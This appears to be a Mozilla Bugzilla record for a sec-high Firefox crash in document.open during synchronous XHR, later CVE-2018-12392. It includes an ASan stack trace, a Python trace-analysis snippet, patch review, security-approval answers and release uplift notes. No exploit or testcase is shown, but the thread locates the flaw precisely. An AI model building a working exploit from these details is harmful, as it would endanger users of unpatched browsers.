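#8 0x7eff3aeb9ee3 in nsHTMLDocument::Open(JSContext*, mozilla::dom::Optional<nsTSubstring<char16_t> > const&, nsTSubstring<char16_t> const&, mozilla::ErrorResult&) dom/html/nsHTMLDocument.cpp:1532:11
#20 0x7eff3a9f3a4a in void mozilla::dom::EventHandlerNonNull::Call<nsISupports*>(nsISupports* const&, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) EventHandlerBinding.h:363:12
#28 0x7eff3727d8e1 in FocusBlurEvent::Run() dom/base/nsFocusManager.cpp:2077:12
#34 0x7eff3714cd10 in nsIDocument::UnsuppressEventHandlingAndFireEvents(bool) dom/base/nsDocument.cpp:9332:5
#35 0x7eff36cca940 in nsGlobalWindowInner::FreeInnerObjects() dom/base/nsGlobalWindowInner.cpp:1211:13
#36 0x7eff36d4a455 in nsGlobalWindowOuter::SetNewDocument(nsIDocument*, nsISupports*, bool) dom/base/nsGlobalWindowOuter.cpp:1973:19
#37 0x7eff3aeb9b20 in nsHTMLDocument::Open(JSContext*, mozilla::dom::Optional<nsTSubstring<char16_t> > const&, nsTSubstring<char16_t> const&, mozilla::ErrorResult&) dom/html/nsHTMLDocument.cpp:1498:22
#38 0x7eff3aebebb4 in nsHTMLDocument::WriteCommon(JSContext*, nsTSubstring<char16_t> const&, bool, mozilla::ErrorResult&) dom/html/nsHTMLDocument.cpp:1768:38
#40 0x7eff39b77c81 in mozilla::dom::HTMLDocument_Binding::writeln(JSContext*, JS::Handle<JSObject*>, nsHTMLDocument*, JSJitMethodCallArgs const&) dom/bindings/HTMLDocumentBinding.cpp:421:9
#62 0x7eff3ca34422 in mozilla::dom::WebSocket::CreateAndDispatchSimpleEvent(nsTSubstring<char16_t> const&) dom/websocket/WebSocket.cpp:1955:3
#64 0x7eff3ca47bb7 in mozilla::dom::CallDispatchConnectionCloseEvents::Run() dom/websocket/WebSocket.cpp:262:21
#66 0x7eff32f54955 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/threads/nsThreadUtils.cpp:519:10
#67 0x7eff3c927bb2 in SpinEventLoopUntil<mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at dom/xhr/XMLHttpRequestMainThread.cpp:2937:31)> nsThreadUtils.h:334:25
#68 0x7eff3c927bb2 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*) dom/xhr/XMLHttpRequestMainThread.cpp:2937
#70 0x7eff39412c7f in mozilla::dom::XMLHttpRequest_Binding::send(JSContext*, JS::Handle<JSObject*>, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&) dom/bindings/XMLHttpRequestBinding.cpp:1277:9
#107 0x7eff32f54955 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/threads/nsThreadUtils.cpp:519:10
"""

if __name__ == "__main__":
    report = analyze(SAMPLE_TRACE)
    print("innermost:", report["innermost"])
    for loop in report["nested_loops"]:
        print("nested loop at #%d: %s blocked, %s ran inside" % (
            loop["loop_frame"], loop["blocked_in"], loop["ran_inside"]))
    for name, info in report["reentered"].items():
        print("re-entered:", name, info)
```

On the sample this reports that XMLHttpRequestMainThread::SendInternal was blocked in the loop at frame 67 while the WebSocket close-event task ran inside it, and that nsHTMLDocument::Open appears at frames 8 and 37 with no loop between them: the inner open() is direct re-entry from the focus handler, which is the shape the rest of this bug is about. Real traces carry far more plumbing frames than the sample; tune PLUMBING for the code base rather than treating its output as a verdict.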
Assignee: nobody → bugs
Component: DOM: Networking → DOM
Nothing to do with XPConnect or dom bindings either ;)
This is about document.open and replacing inner window and such.
This seems to crash pretty reliably even on a debug build (non-asan), at least when loaded from a local file.
Oh, this is a bit more fun than I thought. This is about template's document, and
related to https://bugzilla.mozilla.org/show_bug.cgi?id=1022869
We need at least this. Fixes the crash.


I will file a new bug about other issues
Attachment #9012513 - Flags: review?(peterv)
Flags: needinfo?(overholt)
Comment on attachment 9012513 [details] [diff] [review]
dont_unsupress_during_document_open.diff

Review of attachment 9012513 [details] [diff] [review]:
-----------------------------------------------------------------

::: dom/base/nsGlobalWindowInner.cpp
@@ +1148,5 @@
>    }
>  }
>  
>  void
> +nsGlobalWindowInner::FreeInnerObjects(bool aForDocumentOpen)
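Review bot: the new `bool aForDocumentOpen` parameter on `nsGlobalWindowInner::FreeInnerObjects` says when the function is being called but not what it changes, and the hunk shows neither a default value nor the behaviour it switches. Add a one-line comment at the declaration stating that it skips the `UnsuppressEventHandlingAndFireEvents` step (the frame that fired the delayed focus event in the stack above, which is what the attachment name `dont_unsupress_during_document_open` implies), so a reader of a call site such as `FreeInnerObjects(true)` does not need this bug for context; a two-valued enum instead of a bare bool would achieve the same at the call sites.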

Maybe name this aUnsuppressEventHandling (reversing the values of course)?
Attachment #9012513 - Flags: review?(peterv) → review+
I actually wanted to use aForDocumentOpen since I expect that others might need it too.
And it is, IMO, easier to understand why such a special case is happening.
Comment on attachment 9012513 [details] [diff] [review]
dont_unsupress_during_document_open.diff

[Security approval request comment]
How easily could an exploit be constructed based on the patch?
The patch does pinpoint the issue, and actually, constructing at least a crash should be somewhat easy.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
Commit message could be something like
-m "Bug 1492823, ensure user input suppression works correctly even after document.open, r=peterv"

Which older supported branches are affected by this flaw?
all

If not all supported branches, which bug introduced the flaw?
see above. (I think this has been an issue at least since bug 946641, FF28)

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
Looks like esr60 might need a separate patch, since bug 1451913 is the one which added handleDocumentOpen variable.

How likely is this patch to cause regressions; how much testing does it need?
I'd say rather unlikely to cause regressions. One needs to have document.open running inside sync xhr or so.
Attachment #9012513 - Flags: sec-approval?
We only have two betas left. This bug will need release management approval, so we can backport to affected branches, before I can give sec-approval.

Ritu?
Flags: needinfo?(rkothari)
OK to approve.
Flags: needinfo?(rkothari) → needinfo?(abillings)
Comment on attachment 9012513 [details] [diff] [review]
dont_unsupress_during_document_open.diff

sec-approval+ for trunk.
Can we get a beta and ESR60 patch made and nominated as well, to land after trunk?
Flags: needinfo?(abillings)
Attachment #9012513 - Flags: sec-approval? → sec-approval+
The patch applies to beta just fine.
Comment on attachment 9012513 [details] [diff] [review]
dont_unsupress_during_document_open.diff

[Beta/Release Uplift Approval Request]

Feature/Bug causing the regression: None

User impact if declined: 

Is this code covered by automated tests?: No

Has the fix been verified in Nightly?: Yes

Needs manual test from QE?: Yes

If yes, steps to reproduce: See comment 0

List of other uplifts needed: None

Risk to taking this patch: Low

Why is the change risky/not risky? (and alternatives if risky): 

String changes made/needed: NA
Attachment #9012513 - Flags: approval-mozilla-beta?
Hmm, I'm having trouble reproducing in esr60, but I can't see why this wouldn't happen there.
Will upload a patch.
Same for esr60, but this needs handleDocumentOpen
from https://bug1451913.bmoattachments.org/attachment.cgi?id=8967455
Attachment #9015291 - Flags: review?(peterv)
https://hg.mozilla.org/mozilla-central/rev/9d7540135cac
Group: dom-core-security → core-security-release
Status: NEW → RESOLVED
Closed: 2 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla64
Comment on attachment 9012513 [details] [diff] [review]
dont_unsupress_during_document_open.diff

Approved for 63.0b14. Will also approve for ESR 60.3 once the patch gets r+.
Attachment #9012513 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Flags: qe-verify+
Whiteboard: [post-critsmash-triage]
Attachment #9015291 - Flags: review?(peterv) → review+
Comment on attachment 9015291 [details] [diff] [review]
dont_unsupress_during_document_open_esr60.diff

Fixes a sec-high, approved for ESR 60.3.
Attachment #9015291 - Flags: approval-mozilla-esr60+
Verified that the crash is no longer reproducible using the attached testcases, on latest Nightly 64 (asan and debug), latest Beta 63 (asan and non-asan) and latest ESR from https://tools.taskcluster.net/index/gecko.v2.mozilla-esr60.latest.firefox
Status: RESOLVED → VERIFIED
Flags: qe-verify+
Whiteboard: [post-critsmash-triage] → [post-critsmash-triage][adv-main63+][adv-esr60.3+]
Alias: CVE-2018-12392
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty+
Component: DOM → DOM: Core & HTML
Group: core-security-release